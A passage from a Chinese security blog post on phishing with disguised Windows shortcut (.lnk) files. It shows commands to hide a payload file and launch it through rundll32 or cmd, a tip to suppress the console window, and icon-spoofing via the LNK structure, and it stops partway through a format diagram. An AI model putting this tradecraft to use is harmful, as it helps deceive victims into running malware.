<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: light)">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: dark)"><meta name="generator" content="Hexo 6.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" integrity="sha256-HtsXJanqjKTc8vVQjO4YMhiqFoXkfBsjBWcX91T1jr8=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"example.com","root":"/","images":"/images","scheme":"Muse","darkmode":true,"version":"8.15.1","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":{"enable":false,"style":null},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"},"path":"/search.xml","localsearch":{"enable":"ture","trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false}}</script><script src="/js/config.js"></script>

    <meta name="description" content="快捷方式钓鱼再谈，图标，文件名强伪装，嵌入CS马">
<meta property="og:type" content="article">
<meta property="og:title" content="快捷方式钓鱼再谈">
<meta property="og:url" content="http://example.com/2023/05/17/%E7%A4%BE%E5%B7%A5/%E5%BF%AB%E6%8D%B7%E6%96%B9%E5%BC%8F%E9%92%93%E9%B1%BC%E5%86%8D%E8%B0%88/index.html">
<meta property="og:site_name" content="欢 迎 光 临">
<meta property="og:description" content="快捷方式钓鱼再谈，图标，文件名强伪装，嵌入CS马">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/images/1665399584783-4a90924b-8f0c-47fc-a810-77cfb579cc17.png">
<meta property="og:image" content="http://example.com/images/1665399815623-547671f3-5d72-439f-b4e7-530b45e210f5.png">
<meta property="og:image" content="http://example.com/images/1665400568290-c88146d9-1e75-41fa-9f44-2a81aa0125ed.png">
<meta property="og:image" content="http://example.com/images/1665417001715-4305fe44-bea6-4ea2-95da-b5ba2fe80b08.png">
<meta property="og:image" content="http://example.com/images/1665448852141-39226b39-0239-477a-9946-f1dbb2c9f376.png">
<meta property="og:image" content="http://example.com/images/1665449026463-c440ef39-245d-490b-8e58-4e42455e9df2.png">
<meta property="og:image" content="http://example.com/images/1665449054639-c001cccf-734f-41f9-b24d-ee553bac9a9f.png">
<meta property="og:image" content="http://example.com/images/1665401068556-49d67a9a-578d-4596-a01b-66a7f2d0ad33.png">
<meta property="og:image" content="http://example.com/images/1665449148607-4fc1a94d-4fc2-4c19-b1c7-3ec8f0013236.png">
<meta property="og:image" content="http://example.com/images/1665449361659-84c1501a-3175-4f82-ae7b-2c277af2d638.png">
<meta property="og:image" content="http://example.com/images/1665449372237-68597204-7e1d-470f-856a-8fc5a08f79a9.png">
<meta property="og:image" content="http://example.com/images/1665449469739-97141389-28dc-4373-ae25-98d3b281d018.png">
<meta property="og:image" content="http://example.com/images/1665449615993-a1978ba5-f4c6-49e5-b18a-a954c6ccb14b.png">
<meta property="og:image" content="http://example.com/images/1665449654644-b26a1cdd-ff1d-4735-821d-54c1510947b0.png">
<meta property="og:image" content="http://example.com/images/1665449969327-f7402ddf-2429-4e63-b3e5-b4cbd722a464.png">
<meta property="og:image" content="http://example.com/images/1665450085655-738f35b4-d579-4079-8302-b9bd95e5d8bd.png">
<meta property="og:image" content="http://example.com/images/1665450145199-70b7fc0d-971b-4570-895c-fad9710d47f4.png">
<meta property="og:image" content="http://example.com/images/1665451416694-f98ca1eb-6679-4cd2-afb5-586a8c6b1bc6.png">
<meta property="og:image" content="http://example.com/images/1665451441107-aab9bf48-9cdf-405f-af74-2aa42095d97a.png">
<meta property="og:image" content="http://example.com/images/1665455158285-a07780b0-f8a2-436f-92d3-172649413911.png">
<meta property="og:image" content="http://example.com/images/1665455262391-83d350e1-622d-43ea-967b-26c533c572b5.png">
<meta property="og:image" content="http://example.com/images/1665456893419-6732528f-be69-4471-bfa8-75d494ee4282.png">
<meta property="og:image" content="http://example.com/images/1665457436660-0e1931a0-156d-4f54-9726-9672922fc98c.png">
<meta property="og:image" content="http://example.com/images/1665457676104-165a6e44-8cd9-4c32-8fd1-ec68a836831c.png">
<meta property="og:image" content="http://example.com/images/1665458045962-5cc05b52-b081-4991-ab42-fb2a8684ad09.png">
<meta property="og:image" content="http://example.com/images/1665458144402-e009022e-fd8e-4de6-b92a-7609fd3b0664.png">
<meta property="og:image" content="http://example.com/images/1665458893172-47f4279c-5d0f-4c15-9be5-42f619aedf41.png">
<meta property="og:image" content="http://example.com/images/1665458966398-42a23069-5d02-425d-9ca6-75e47102cf80.png">
<meta property="og:image" content="http://example.com/images/1665459124727-bb6812a6-5658-4148-a4cc-76262d60e76d.png">
<meta property="og:image" content="http://example.com/images/1665459202295-1d77853f-1775-48cf-89c1-bf3c93412425.png">
<meta property="og:image" content="http://example.com/images/1665467986539-d2a3a6a4-b67c-4c40-8c8b-0e2b34036c8f.png">
<meta property="og:image" content="http://example.com/images/1665467942850-b3dfbf5a-151a-49a2-98f1-c85ffdb9bae1.png">
<meta property="og:image" content="http://example.com/images/1665472045813-2bc1ed2f-1f30-4b91-b6a4-748bb7fc8146.png">
<meta property="og:image" content="http://example.com/images/1665474274726-1565b7a5-f3bc-49ca-b6e7-043b05f3d39d.png">
<meta property="og:image" content="http://example.com/images/1665472376694-53070b44-f220-424b-b8ad-f9a3f34be83b.png">
<meta property="og:image" content="http://example.com/images/1665472900336-5d026455-8c2d-43db-978d-2a612e066b7b.png">
<meta property="og:image" content="http://example.com/images/1665473037840-4930e672-fdf9-4e8a-8133-448b5a6c3d5c.png">
<meta property="og:image" content="http://example.com/images/1665473487702-0069c60a-9e84-447d-af7d-2a1af56fd50f.png">
<meta property="og:image" content="http://example.com/images/1665474657690-79b0425a-0e96-47cb-864b-5b504b7990e6.png">
<meta property="og:image" content="http://example.com/images/1665475113282-ffede604-f1b5-48dc-93f4-9b904c30c2d0.png">
<meta property="og:image" content="http://example.com/images/1665451568354-fc4ef57e-c5f6-46da-ac29-dff3436a976a.png">
<meta property="og:image" content="http://example.com/images/1665451618704-cfaa2519-a622-4b91-871d-c7021a961989.png">
<meta property="og:image" content="http://example.com/images/1665476335516-aa884d29-153d-49d7-b917-f6a3a31ca4f6.png">
<meta property="og:image" content="http://example.com/images/1665477214353-8e64941a-4d98-4867-81c1-8d90ee2cefb2.png">
<meta property="og:image" content="http://example.com/images/1665477331163-0842d5f8-ec5c-4ea0-ac1d-7f45940b558a.png">
<meta property="og:image" content="http://example.com/images/1665477692051-f245a0b4-655d-4186-915f-397caa397b2e.png">
<meta property="og:image" content="http://example.com/images/1665477821386-e204c1de-cc0b-465d-b43a-2579d1bf9766.png">
<meta property="og:image" content="http://example.com/images/1665478534564-b79529b0-91eb-44ae-9be5-be4f3f0b114a.png">
<meta property="og:image" content="http://example.com/images/1665478705153-885c62ce-8894-4e3f-830f-9b9b06f3f68c.png">
<meta property="og:image" content="http://example.com/images/1665478279003-94c1ad2c-d640-46c7-b1f3-47e111d364c3.png">
<meta property="article:published_time" content="2023-05-17T07:49:24.256Z">
<meta property="article:modified_time" content="2023-05-17T07:51:42.127Z">
<meta property="article:author" content="fn">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/images/1665399584783-4a90924b-8f0c-47fc-a810-77cfb579cc17.png">


<link rel="canonical" href="http://example.com/2023/05/17/%E7%A4%BE%E5%B7%A5/%E5%BF%AB%E6%8D%B7%E6%96%B9%E5%BC%8F%E9%92%93%E9%B1%BC%E5%86%8D%E8%B0%88/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"http://example.com/2023/05/17/%E7%A4%BE%E5%B7%A5/%E5%BF%AB%E6%8D%B7%E6%96%B9%E5%BC%8F%E9%92%93%E9%B1%BC%E5%86%8D%E8%B0%88/","path":"2023/05/17/社工/快捷方式钓鱼再谈/","title":"快捷方式钓鱼再谈"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>快捷方式钓鱼再谈 | 欢 迎 光 临</title>
  








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">欢 迎 光 临</p>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup"><div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off" maxlength="80"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close" role="button">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div class="search-result-container no-result">
  <div class="search-result-icon">
    <i class="fa fa-spinner fa-pulse fa-5x"></i>
  </div>
</div>

    </div>
  </div>

</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%A6%82%E8%BF%B0"><span class="nav-number">1.</span> <span class="nav-text">概述</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E6%81%B6%E6%84%8F%E7%9A%84%E5%BF%AB%E6%8D%B7%E6%96%B9%E5%BC%8F%EF%BC%8C%E4%B8%80%E8%88%AC%E5%88%A9%E7%94%A8%E6%96%B9%E5%BC%8F%E6%9C%89%E5%A6%82%E4%B8%8B%E4%B8%89%E7%A7%8D"><span class="nav-number">1.0.0.1.</span> <span class="nav-text">恶意的快捷方式，一般利用方式有如下三种</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E9%9A%90%E8%97%8F%E6%96%87%E4%BB%B6"><span class="nav-number">1.0.1.</span> <span class="nav-text">隐藏文件</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#Lnk%E5%BF%AB%E6%8D%B7%E6%96%B9%E5%BC%8F%E6%89%A7%E8%A1%8C%E7%9B%B8%E5%AF%B9%E8%B7%AF%E5%BE%84%E7%A8%8B%E5%BA%8F"><span class="nav-number">1.0.1.1.</span> <span class="nav-text">Lnk快捷方式执行相对路径程序</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E6%B3%A8%E6%84%8F"><span class="nav-number">1.0.1.2.</span> <span class="nav-text">注意</span></a></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%AE%BE%E7%BD%AE%E5%BF%AB%E6%8D%B7%E6%96%B9%E5%BC%8F%E5%9B%BE%E6%A0%87"><span class="nav-number">2.</span> <span class="nav-text">设置快捷方式图标</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#LNK%E6%96%87%E4%BB%B6%E7%9A%84%E7%BB%93%E6%9E%84"><span class="nav-number">3.</span> <span class="nav-text">LNK文件的结构</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%88%9B%E5%BB%BA%E5%BF%AB%E6%8D%B7%E6%96%B9%E5%BC%8F"><span class="nav-number">3.0.0.1.</span> <span class="nav-text">创建快捷方式</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%B0%86%E8%BF%99%E4%B8%80%E6%AE%B5%E7%9A%8416%E8%BF%9B%E5%88%B6%E5%80%BC%E6%94%B9%E4%B8%BA"><span class="nav-number">3.0.0.2.</span> <span class="nav-text">将这一段的16进制值改为</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E4%B9%9F%E5%8F%AF%E4%BB%A5%E9%80%9A%E8%BF%87%E6%A8%A1%E6%9D%BF%E7%9B%B4%E6%8E%A5%E4%BF%AE%E6%94%B9"><span class="nav-number">3.0.0.3.</span> <span class="nav-text">也可以通过模板直接修改</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%8F%AF%E4%BB%A5%E7%9C%8B%E5%88%B0%E5%B7%B2%E7%BB%8F%E6%9B%B4%E6%94%B9"><span class="nav-number">3.0.0.4.</span> <span class="nav-text">可以看到已经更改</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E6%94%BE%E5%88%B0%E5%85%B6%E4%BB%96%E6%9C%BA%E5%99%A8%EF%BC%8C%E6%88%90%E5%8A%9F%E6%8C%89%E7%85%A7%E9%BB%98%E8%AE%A4%E9%85%8D%E7%BD%AE%E6%98%BE%E7%A4%BA"><span class="nav-number">3.0.0.5.</span> <span class="nav-text">放到其他机器，成功按照默认配置显示</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E6%94%B9%E4%B8%BAdocx"><span class="nav-number">3.0.0.6.</span> <span class="nav-text">改为docx</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E6%B3%A8%E6%84%8F-1"><span class="nav-number">3.0.0.7.</span> <span class="nav-text">注意</span></a></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%9B%B4%E6%94%B9%E5%BF%AB%E6%8D%B7%E6%96%B9%E5%BC%8F%E5%90%8E%E7%BC%80"><span class="nav-number">4.</span> <span class="nav-text">更改快捷方式后缀</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%89%A7%E8%A1%8C%E6%81%B6%E6%84%8F%E7%A8%8B%E5%BA%8F"><span class="nav-number">5.</span> <span class="nav-text">执行恶意程序</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E6%89%A7%E8%A1%8C%E8%BF%9C%E7%A8%8B%E6%81%B6%E6%84%8F%E4%BB%A3%E7%A0%81"><span class="nav-number">5.0.0.1.</span> <span class="nav-text">执行远程恶意代码</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#powershell"><span class="nav-number">5.0.0.2.</span> <span class="nav-text">powershell</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#mshta"><span class="nav-number">5.0.0.3.</span> <span class="nav-text">mshta</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E7%82%B9%E5%87%BB%E5%8D%B3%E4%B8%8A%E7%BA%BF"><span class="nav-number">5.0.0.4.</span> <span class="nav-text">点击即上线</span></a></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%89%A7%E8%A1%8C%E8%87%AA%E8%BA%AB%E6%81%B6%E6%84%8F%E4%BB%A3%E7%A0%81"><span class="nav-number">6.</span> <span class="nav-text">执行自身恶意代码</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%A4%A7%E8%87%B4%E9%80%BB%E8%BE%91"><span class="nav-number">6.0.0.1.</span> <span class="nav-text">大致逻辑</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%B0%86%E6%81%B6%E6%84%8F%E4%BB%A3%E7%A0%81%E8%BF%BD%E5%8A%A0%E5%86%99%E8%BF%9BLnk%E6%96%87%E4%BB%B6"><span class="nav-number">6.0.0.2.</span> <span class="nav-text">将恶意代码追加写进Lnk文件</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E9%A6%96%E5%85%88%E5%85%88%E6%8A%8A%E5%BF%AB%E6%8D%B7%E6%96%B9%E5%BC%8F%E5%81%9A%E5%A5%BD"><span class="nav-number">6.0.0.3.</span> <span class="nav-text">首先先把快捷方式做好</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#windows%E6%B2%A1%E6%9C%89printf%E5%91%BD%E4%BB%A4%E5%8F%AF%E4%BB%A5%E7%94%A8git%E7%9A%84bash"><span class="nav-number">6.0.0.4.</span> <span class="nav-text">windows没有printf命令可以用git的bash</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E4%BB%8E0D-0A%E4%B8%80%E7%9B%B4%E5%88%B0%E6%9C%80%E5%90%8E%E7%9A%840D-0A%E5%B0%B1%E6%98%AF%E6%88%91%E4%BB%AC%E8%BF%BD%E5%8A%A0%E8%BF%9B%E7%9A%84%E6%9C%A8%E9%A9%AC"><span class="nav-number">6.0.0.5.</span> <span class="nav-text">从0D 0A一直到最后的0D 0A就是我们追加进的木马</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#findstr%E6%8F%90%E5%8F%96%E5%AF%B9%E5%BA%94%E7%9A%84%E6%81%B6%E6%84%8F%E7%BC%96%E7%A0%81"><span class="nav-number">6.0.0.6.</span> <span class="nav-text">findstr提取对应的恶意编码</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#base64%E7%BC%96%E7%A0%81%E5%90%8E%E7%9A%84%E5%89%8D%E7%BC%80%E6%98%AFTVqQAAMAAAAEAAA"><span class="nav-number">6.0.0.7.</span> <span class="nav-text">base64编码后的前缀是TVqQAAMAAAAEAAA</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E6%8F%90%E5%8F%96%E5%87%BA%E6%81%B6%E6%84%8F%E7%BC%96%E7%A0%81%EF%BC%8C%E8%BE%93%E5%85%A5%E5%88%B0%E4%B8%B4%E6%97%B6%E6%96%87%E4%BB%B6"><span class="nav-number">6.0.0.8.</span> <span class="nav-text">提取出恶意编码，输入到临时文件</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#certutil-%E8%A7%A3%E7%A0%81%E6%8F%90%E5%8F%96%E6%BA%90%E6%96%87%E4%BB%B6"><span class="nav-number">6.0.0.9.</span> <span class="nav-text">certutil 解码提取源文件</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E6%9C%80%E5%90%8E%E4%B8%80%E6%AD%A5%EF%BC%8C%E8%BF%90%E8%A1%8Chack-exe"><span class="nav-number">6.0.0.10.</span> <span class="nav-text">最后一步，运行hack.exe</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%B0%86%E4%B8%8A%E8%BF%B0%E5%91%BD%E4%BB%A4%E7%94%A8-amp-%E4%B8%B2%E8%81%94"><span class="nav-number">6.0.0.11.</span> <span class="nav-text">将上述命令用&amp;串联</span></a></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%80%BB%E7%BB%93"><span class="nav-number">7.</span> <span class="nav-text">总结</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%B3%A8%E6%84%8F-2"><span class="nav-number">8.</span> <span class="nav-text">注意</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%BF%87%E9%95%BF%E5%8F%82%E6%95%B0%E5%A4%84%E7%90%86"><span class="nav-number">9.</span> <span class="nav-text">过长参数处理</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E8%BF%99%E6%97%B6%E5%8F%AF%E7%9B%B4%E6%8E%A5%E7%BC%96%E8%BE%91%E8%AF%A5%E6%96%87%E4%BB%B6%E8%AE%BE%E7%BD%AE%E5%85%B6%E5%8F%82%E6%95%B0"><span class="nav-number">9.0.0.1.</span> <span class="nav-text">这时可直接编辑该文件设置其参数</span></a></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E9%9A%90%E8%97%8F%E5%90%8E%E7%BC%80"><span class="nav-number">10.</span> <span class="nav-text">隐藏后缀</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%80%9F%E5%8A%A9RLO%E5%AD%97%E7%AC%A6"><span class="nav-number">10.0.0.1.</span> <span class="nav-text">借助RLO字符</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E6%B3%A8%E6%84%8F%EF%BC%8C%E4%B8%8D%E8%83%BD%E7%9B%B4%E6%8E%A5%E8%BE%93%E5%85%A5-lt-gt"><span class="nav-number">10.0.0.2.</span> <span class="nav-text">注意，不能直接输入&lt;&gt;</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%8F%B3%E9%94%AE%E2%80%93-gt-%E6%8F%92%E5%85%A5unicode"><span class="nav-number">10.0.0.3.</span> <span class="nav-text">右键–&gt;插入unicode</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%AE%9E%E4%BE%8B"><span class="nav-number">10.0.0.4.</span> <span class="nav-text">实例</span></a></li></ol></li></ol></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">fn</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">32</span>
          <span class="site-state-item-name">总计</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">5</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
  </nav>
</div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2023/05/17/%E7%A4%BE%E5%B7%A5/%E5%BF%AB%E6%8D%B7%E6%96%B9%E5%BC%8F%E9%92%93%E9%B1%BC%E5%86%8D%E8%B0%88/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="fn">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="欢 迎 光 临">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="快捷方式钓鱼再谈 | 欢 迎 光 临">
      <meta itemprop="description" content="快捷方式钓鱼再谈，图标，文件名强伪装，嵌入CS马">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          快捷方式钓鱼再谈
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>
      

      <time title="创建时间：2023-05-17 15:49:24 / 修改时间：15:51:42" itemprop="dateCreated datePublished" datetime="2023-05-17T15:49:24+08:00">2023-05-17</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/%E7%A4%BE%E5%B7%A5/" itemprop="url" rel="index"><span itemprop="name">社工</span></a>
        </span>
    </span>

  
    <span class="post-meta-break"></span>
    <span class="post-meta-item" title="本文字数">
      <span class="post-meta-item-icon">
        <i class="far fa-file-word"></i>
      </span>
      <span class="post-meta-item-text">本文字数：</span>
      <span>4.4k</span>
    </span>
    <span class="post-meta-item" title="阅读时长">
      <span class="post-meta-item-icon">
        <i class="far fa-clock"></i>
      </span>
      <span class="post-meta-item-text">阅读时长 &asymp;</span>
      <span>8 分钟</span>
    </span>
</div>

            <div class="post-description">快捷方式钓鱼再谈，图标，文件名强伪装，嵌入CS马</div>
        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <h2 id="概述"><a href="#概述" class="headerlink" title="概述"></a>概述</h2><h5 id="恶意的快捷方式，一般利用方式有如下三种"><a href="#恶意的快捷方式，一般利用方式有如下三种" class="headerlink" title="恶意的快捷方式，一般利用方式有如下三种"></a>恶意的快捷方式，一般利用方式有如下三种</h5><p>通过伪装的lnk文件，执行当前目录下某个恶意文件（一般会设为隐藏文件）</p>
<p>通过伪装的lnk文件，加载并执行远程的恶意代码</p>
<p>仅存放一个link文件，执行自身的恶意代码</p>
<h4 id="隐藏文件"><a href="#隐藏文件" class="headerlink" title="隐藏文件"></a>隐藏文件</h4><p>详细在windows相关–&gt;隐藏文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">attrib +h +s output.apk</span><br></pre></td></tr></table></figure>

<h5 id="Lnk快捷方式执行相对路径程序"><a href="#Lnk快捷方式执行相对路径程序" class="headerlink" title="Lnk快捷方式执行相对路径程序"></a>Lnk快捷方式执行相对路径程序</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">C:\Windows\System32\rundll32.exe url.dll,FileProtocolHandler xxx.exe</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">C:\Windows\System32\cmd.exe /c start xxx.exe</span><br></pre></td></tr></table></figure>

<h5 id="注意"><a href="#注意" class="headerlink" title="注意"></a>注意</h5><p>当我们使用cmd时，或是待执行的恶意文件为bat等文件时，会闪出一个黑窗口(一闪而过)，这时可设置其运行方式为”最小化”，以避免此问题。</p>
<p><img src="/images/1665399584783-4a90924b-8f0c-47fc-a810-77cfb579cc17.png"></p>
<h2 id="设置快捷方式图标"><a href="#设置快捷方式图标" class="headerlink" title="设置快捷方式图标"></a>设置快捷方式图标</h2><p>之前谈过快捷方式的图标在属性中就可以修改</p>
<p><img src="/images/1665399815623-547671f3-5d72-439f-b4e7-530b45e210f5.png"></p>
<p>以pdf文件为例，在windows系统中，pdf文件展示的图标一般是第三方应用的图标，有些默认用chrome打开pdf文件，那pdf文件的图标在他的电脑上就是chrome的图标，有些默认用 Adobe Reader，则pdf文件的图标在他的电脑上是 Adobe Reader图标。</p>
<p>自定义的图标，在快捷方式中存储的是路径，传到其他主机中，需要将图标文件同时上传，还需要修改路径</p>
<p><img src="/images/1665400568290-c88146d9-1e75-41fa-9f44-2a81aa0125ed.png"></p>
<p>怎么将文件的图标随目标系统的默认配置而修改？</p>
<h2 id="LNK文件的结构"><a href="#LNK文件的结构" class="headerlink" title="LNK文件的结构"></a>LNK文件的结构</h2><p>LNK文件的结构，我们可以找到一个字段: ICON_LOCATION，当设置了 HasIconLocation标识后，可通过 ICON_LOCATION来指定这个快捷方式使用图标。对应了快捷方式属性设置中的”更改图标”操作，如下图所示。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">.lnk 文件格式</span><br><span class="line">+---------------------------+</span><br><span class="line">| lnk file header |</span><br><span class="line">+---------------------------+ &gt;------.</span><br><span class="line">| Shell Item Id List | |</span><br><span class="line">+---------------------------+ |</span><br><span class="line">| File location info | |</span><br><span class="line">+---------------------------+ |</span><br><span class="line">| Description string | |</span><br><span class="line">+---------------------------+ ---</span><br><span class="line">| Relative path string | 这几个节不是每一个都必须存在，如果存在就要按这样的顺序关系排列。</span><br><span class="line">+---------------------------+ ---</span><br><span class="line">| Working directory string | |</span><br><span class="line">+---------------------------+ |</span><br><span class="line">| Command line string | |</span><br><span class="line">+---------------------------+ |</span><br><span class="line">| Icon filename string | |</span><br><span class="line">+---------------------------+ 